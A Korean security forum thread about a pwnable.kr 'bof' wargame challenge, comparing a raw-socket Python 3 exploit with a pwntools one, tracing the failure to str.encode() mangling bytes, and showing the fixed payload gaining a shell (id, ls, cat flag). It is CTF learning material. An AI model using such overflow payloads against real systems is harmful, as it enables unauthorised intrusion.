시스템 해킹

1574,

6/79

ocal

pwntools 사용시와 기본 socket 모듈 이용시 차이?

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=1987 [복사]

안녕하세요.

pwnable.kr에서 문제를 푸는데 pwntools 배우기 귀찮고 해서 그냥 socket 모듈로 했는데 왜 이후에 명령어를 먹는 부분에서 다른걸까요.

bof 문제를 기반하여 예를 들어보겠습니다.

제가 처음에 했던 것은 윈도우에서 파이썬 3을 가지고 아래 프로그램을 썼습니다.

import socket

X = socket.socket()
X.connect(("pwnable.kr",9000))

payload = "A"*0x34 + "\xbe\xba\xfe\xca" + '\n'

X.sendall(payload.encode())

X.sendall("id\n".encode())

print(X.recv(0x100))

그런데 이렇게 되면 id 명령어의 결과가 전달이 안됩니다.

그런데 아래처럼 인터넷에 돌아다니는 소스는 이런게 됩니다.

from pwn import *

r = remote("pwnable.kr", 9000)

payload = "D"*52 + "\xbe\xba\xfe\xca"

r.sendline( payload )
r.sendline('ls')
print(r.recv())
r.sendline('cat flag')
print(r.recv())
r.close()

출처: https://mandu-mandu.tistory.com/71

이 문제 말고도 nc를 사용하는 문제 여러개가 다 이런 현상을 나타내는데,
pwn을 구현할 때 무엇을 해주어서 이게 되는걸까요?

솔직히 pwntools 깃허브도 한번 뜯어보고 했는데 도무지 모르겠습니다.

Hit : 2276 Date : 2020/01/09 01:38


군인	python3 버전을 이용하시는것 같네요. 기능면에서는 socket과 pwntools는 똑같습니다. 다만, python3의 encode() 함수 때문인것 같은데 \xbe\xba\xfe\xca 이러한 정상적인 ASCII 범위를 넘어난 값들을 encode() 함수로 처리할 시 내용이 바뀌게 되는 현상이 있어서 그런것 같습니다.	2020/01/09
ocal	오호 그렇군요 그 부분을 한번 고쳐보겠습니다.	2020/01/10
ocal	오 정말 그런 것 같네요. payload를 파이썬 문자열로 쓰지 않고 처음부터 bytestring으로 작성해서 str.encode() 메소드를 쓰지 않고 바로 보내면 잘 됩니다. 감사합니다. 아래는 고친 코드입니다. #python3 import socket X = socket.socket() X.connect(("pwnable.kr",9000)) payload = b"A"*0x34 + b"\xbe\xba\xfe\xca" + b'\n' X.sendall(payload) X.sendall("id\n".encode()) print(X.recv(0x100)) 결과: b'uid=1008(bof) gid=1008(bof) groups=1008(bof)\n'	2020/01/10
군인	^_^	2020/01/13

1474

asis CTF 문제풀다가....[4]

vngkv123

04/12

2266

pwntools 사용시와 기본 socket 모듈 이용시 차이?[4]

ocal

01/09

2275

1472

pwnable.kr uaf 문제 질문있습니다

pkdo1030

07/22

2279

1471

도와주세요 대학교수님들한테 물어봐도 이상하게 답변해주세요 ㅠ.[1]

morieye

03/14

2289

1470

checksec, ELF기능, 그외 질문....

vngkv123

06/14

2294

1469

remote exploit시에 안되는거 이유 알 수 있을까요,..[2]

vngkv123

08/13

2297

1468

버퍼오버플로우 질문....[2]

ewqqw

04/16

2304

1467

포맷스트링 개념 제대로 설명해주실분[1]

pkdo1030

07/24

2325

1466

환경변수를 이용한 BOF 공격시 의문점 질문입니다.[5]

tjdalstjr938

01/02

2331

1465

FC10 1번문제

exqa123

01/24

2334

1464

libc-db에서 main_arena 어떻게 찾죠?

vngkv123

07/30

2343

1463

버퍼오버플로우 관련 질문..[1]

ewqqw

04/17

2352

1462

RTL기법 질문[6]

vngkv123

03/23

2353

1461

argv[2]의 주소를 알고 싶습니다.[2]

ka0r1

09/23

2370

1460

용어들 질문..[6]

vngkv123

04/01

2378

1459

ROP GOT overwrite의 strcpy질문.. lob fedora hell_fire[6]

vngkv123

03/26

2381

1458

Rainbow table 아시는분 있나요 ㅠㅠ?

ingod0707

10/07

2397

1457

BOF를 하는 이유가 무엇인가요?[7]

turttle2s

09/03

2398

1456

제가 시스템해킹을 공부하려는데 도와주세요!![2]

t0mcr00se

01/18

2402

1455

ftz 맥으로 ssh 접속 [1]

bunggl

06/30

2406

[1][2][3][4][5] 6 [7][8][9][10]..[79]